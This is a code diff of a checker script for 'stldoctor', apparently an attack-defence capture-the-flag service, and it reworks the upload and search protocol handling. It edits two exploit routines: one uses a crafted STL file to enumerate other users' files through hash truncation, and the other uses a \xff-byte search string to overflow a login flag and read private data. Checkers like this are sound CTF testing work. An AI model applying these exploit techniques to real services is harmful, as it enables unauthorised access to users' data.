aboutsummaryrefslogtreecommitdiffstats
path: root/checker
diff options
context:
space:
mode:
Diffstat (limited to 'checker')
-rw-r--r--checker/local.sh2
-rw-r--r--checker/src/checker.py170
2 files changed, 95 insertions, 77 deletions
diff --git a/checker/local.sh b/checker/local.sh
index 81a6312..713bea0 100644
--- a/checker/local.sh
+++ b/checker/local.sh
@@ -11,4 +11,4 @@ export MONGO_PORT=27017
export MONGO_USER=stldoctor_checker
export MONGO_PASSWORD=stldoctor_checker
-python3 src/checker.py $@
+python3 -u src/checker.py $@
diff --git a/checker/src/checker.py b/checker/src/checker.py
index 6a05448..eb3c521 100644
--- a/checker/src/checker.py
+++ b/checker/src/checker.py
@@ -53,7 +53,7 @@ solid test\xff
vertex 0 1 0
endloop
endfacet
-endsolid test\xff
+endsolid
"""
checker = Enochecker("stldoctor", 9090)
@@ -82,7 +82,7 @@ class Session:
return self
async def __aexit__(self, *args: list[Any], **kwargs: dict[str, Any]) -> None:
- await timed(self.exit(), self.logger, ctx="closing session")
+ await timed(self.close(), self.logger, ctx="closing session")
async def readuntil(self, target: bytes, ctx: Optional[str] = None) -> bytes:
try:
@@ -133,25 +133,16 @@ def _get_session(socket: AsyncSocket, logger: LoggerAdapter) -> Session:
return Session(socket, logger)
-def ensure_bytes(v: Union[str, bytes]) -> bytes:
- if type(v) == bytes:
- return v
- elif type(v) == str:
- return v.encode()
- else:
- raise InternalErrorException(f"Tried to convert {type(v)} arg to bytes")
-
-
def includes_all(resp: bytes, targets: list[bytes]) -> bool:
for m in targets:
- if ensure_bytes(m) not in resp:
+ if m not in resp:
return False
return True
def includes_any(resp: bytes, targets: list[bytes]) -> bool:
for m in targets:
- if ensure_bytes(m) in resp:
+ if m in resp:
return True
return False
@@ -420,36 +411,57 @@ async def do_upload(
stlfile: bytes,
check: bool = True,
) -> Optional[bytes]:
- # Upload file
+
session.logger.debug(f"Uploading model with name {modelname!r}")
session.write(b"upload\n")
+
+ # enter name and check resp
session.write(modelname + b"\n")
+ await session.drain()
+ await session.readuntil(b"name: ")
+ resp = await session.read(4, ctx="checking for err response")
+ if resp == b"ERR:":
+ if check:
+ resp = resp + await session.readline()
+ session.logger.critical(f"Failed during name check: {resp!r}")
+ raise MumbleException("File upload not working properly")
+ return None
+
+ # enter size and check resp
+ await session.readuntil(b"size: ")
session.write(f"{len(stlfile)}\n".encode())
- session.write(stlfile)
await session.drain()
+ resp = await session.read(4, ctx="checking for err response")
+ if resp == b"ERR:":
+ if check:
+ resp = resp + await session.readline()
+ session.logger.critical(f"Failed during size check: {resp!r}")
+ raise MumbleException("File upload not working properly")
+ return None
- # Check for errors
- # TODO improve by reading responses separately
- resp = await session.readline(ctx="reading upload response (1)")
- resp += await session.readline(ctx="reading upload response (2)")
+ await session.readuntil(b"listening..\n")
+ session.write(stlfile)
+ await session.drain()
+ resp = await session.readline()
if b"ERR:" in resp:
if check:
- session.logger.critical(f"Failed to upload model {modelname!r}:\n{resp!r}")
+ session.logger.critical(f"Failed during stl parsing: {resp!r}")
raise MumbleException("File upload not working properly")
- await session.readuntil(prompt, ctx="waiting for prompt")
return None
- # Parse ID
+ # parse returned id
try:
modelid = resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1]
if modelid == b"":
raise Exception
except:
session.logger.critical(
- f"Invalid response during upload of {modelname!r}:\n{resp!r}"
+ f"Invalid file size during upload of {modelname!r}:\n{resp!r}"
)
raise MumbleException("File upload not working properly")
+ session.logger.debug(f"Uploaded model id: {modelid!r}")
+
await session.readuntil(prompt, ctx="waiting for prompt")
return modelid
@@ -460,38 +472,38 @@ async def do_search(
download: bool = False,
check: bool = True,
) -> Optional[tuple[bytes, bytes]]:
- modelname = ensure_bytes(modelname)
-
- # Initiate download
session.logger.debug(f"Retrieving model with name {modelname!r}")
+
+ # get possible hashes
session.write(b"search " + modelname + b"\n")
- session.write(b"0\n") # first result
- session.write(b"y\n" if download else b"n\n")
- session.write(b"q\n") # quit
await session.drain()
-
- # Check if an error occured
- line = await session.readline()
- if b"ERR:" in line:
+ resp = await session.readline()
+ if b"ERR:" in resp:
if check:
session.logger.critical(
- f"Failed to retrieve model {modelname!r}:\n{line!r}"
+ f"Failed to retrieve model {modelname!r}:\n{resp!r}"
)
raise MumbleException("File search not working properly")
- if b"Couldn't find a matching scan result" in line:
- # collect all the invalid commands sent after (hacky)
- # TODO: improve by checking every response in search
- await session.readuntil(prompt)
- await session.readuntil(prompt)
- await session.readuntil(prompt)
- await session.readuntil(prompt)
return None
+ resp = resp + await session.readuntil(b"> ")
+ results = [l.strip() for l in resp[:-2].split(b"\n")]
- # read until end of info box
- fileinfo = line + await session.readuntil(
+ # request first result
+ session.write(results[0] + b"\n")
+ await session.drain()
+ resp = await session.readline()
+ if b"ERR:" in resp:
+ if check:
+ session.logger.critical(f"Error selecting file: {results[0]!r}")
+ raise MumbleException("File search not working properly")
+ return None
+ fileinfo = resp + await session.readuntil(
b"================== \n", ctx="reading stl info"
)
+ # download if requested
+ session.write(b"y\n" if download else b"n\n")
+ await session.drain()
stlfile = b""
if download: # Parse file contents
await session.readuntil(b"Here you go.. (", ctx="reading stl size (1)")
@@ -499,13 +511,15 @@ async def do_search(
resp = resp[:-3]
size = parse_int(resp)
if size is None:
- raise MumbleException(
- f"Received invalid download size, response:\n{resp!r}"
- )
-
+ raise MumbleException(f"Invalid download size: {resp!r}")
session.logger.debug(f"Download size: {size}")
stlfile = await session.read(size, ctx="reading stl contents")
+ # only one result
+ session.write(b"q\n")
+ await session.drain()
+
+ # cleanup..
await session.readuntil(prompt)
return fileinfo, stlfile
@@ -513,14 +527,6 @@ async def do_search(
# CHECK WRAPPERS #
-async def check_line(session: Session, context: str) -> bytes:
- line = await session.readline()
- if b"ERR:" in line:
- session.logger.critical(f"{context}: Unexpected error message\n")
- raise MumbleException("Service returned error during valid interaction")
- return line
-
-
async def check_listed(session: Session, includes: list[bytes]) -> bytes:
resp = await do_list(session, check=True)
assert resp is not None
@@ -742,7 +748,8 @@ async def test_bad_upload(di: DependencyInjector, filetype: str, variant: int) -
# Ensure a malformed file causes an error
session = await di.get(Session)
- if await do_upload(session, modelname, stlfile, check=False):
+ resp = await do_upload(session, modelname, stlfile, check=False)
+ if resp is not None:
session.logger.critical(f"Able to upload malformed file:\n{stlfile!r}")
raise MumbleException("Upload validation not working properly")
@@ -754,8 +761,8 @@ async def test_search(di: DependencyInjector, registered: bool = False) -> None:
session = await di.get(Session)
if registered:
await do_auth(session, authstr, check=True)
- if resp := await do_search(session, modelname, download=False, check=False):
- assert resp is not None
+ resp = await do_search(session, modelname, download=False, check=False)
+ if resp is not None:
session.logger.critical(
f"Search for file that shouldn't exist succeeded:\n{resp[0]+resp[1]!r}"
)
@@ -1002,33 +1009,45 @@ async def exploit_prefix_truncation(di: DependencyInjector) -> bytes:
modelname = fakeid()
searcher = await di.get(FlagSearcher)
- # Upload evil file for parse via search for hash truncation
session = await di.get(Session)
session.logger.debug("Uploading evil file for hash truncation")
+
+ # Upload evil file
await do_upload(session, modelname, stlfile=search_truncation_payload, check=True)
search_resp = await do_search(session, modelname, download=False, check=True)
- assert search_resp is not None
- info, contents = search_resp
+ print(search_resp)
+
+ # Retrieve evil file for hash truncation
session.write(b"search last\n")
await session.drain()
- filelist_resp = await session.readuntil(b"? ", ctx="reading search results")
- filelist = [
- l.strip().split(b" : ")[1] for l in filelist_resp.split(b"\n") if b" : " in l
- ]
+ filelist_resp = await session.readuntil(
+ b"[q to quit]: ", ctx="reading search results"
+ )
+ session.logger.critical(filelist_resp)
+ filelist = [l.strip() for l in filelist_resp.split(b"\n")[:-1] if l.strip() != b""]
if len(filelist) == 0:
raise MumbleException("Failed to list files through search")
+ session.logger.critical(filelist)
# Use it to enumerate other files and grab contents
flag = None
- for i, fhash in enumerate(filelist):
- session.logger.debug(f"Retrieving file {fhash} at index {i}")
- session.write(f"{i}\nn\n".encode())
+ for fhash in filelist:
+ session.logger.debug(f"Retrieving file {fhash}")
+ session.write(fhash + b"\n")
+ session.write(b"n\n")
await session.drain()
- filelist_resp = await session.readuntil(
+ resp = await session.readline()
+ if b"ERR:" in resp:
+ session.logger.critical(f"Failed on selection of file: {resp!r}")
+ raise MumbleException("Failed to retrieve file contents via exploit")
+ resp += await session.readuntil(
b"==================", ctx="getting file info (1)"
)
- filelist_resp += await session.readuntil(b"? ", ctx="getting file info (2)")
- if flag := searcher.search_flag(filelist_resp.decode("latin1")):
+ resp += await session.readuntil(
+ b"[q to quit]: ", ctx="getting file info (2)"
+ )
+ session.logger.critical(resp)
+ if flag := searcher.search_flag(resp):
break
# Done!
@@ -1050,7 +1069,7 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None:
session = await di.get(Session)
session.write(b"search \xff\xff\xff\xff\xff0000000000000000\n")
await session.drain()
- await session.readuntil(prompt, ctx="getting user hashes via search")
+ await session.readuntil(prompt, ctx="overflowing loggedin via search")
session.write(b"auth\n")
await session.drain()
resp = await session.readuntil(prompt, ctx="checking auth success")
@@ -1058,9 +1077,8 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None:
raise MumbleException("Exploit did not set 'loggedin' variable via overflow")
# Get private user hashes via 'list'
- resp = await do_list(session, check=False)
- if not resp:
- raise MumbleException("")
+ resp = await do_list(session, check=True)
+ session.logger.critical(resp)
users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l]
await session.exit()
@@ -1088,7 +1106,7 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None:
solidnames = b"\n".join(
[l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l]
)
- if flag := searcher.search_flag(solidnames.decode("latin1")):
+ if flag := searcher.search_flag(solidnames):
return flag
raise MumbleException("Exploit for flagstore 2 failed")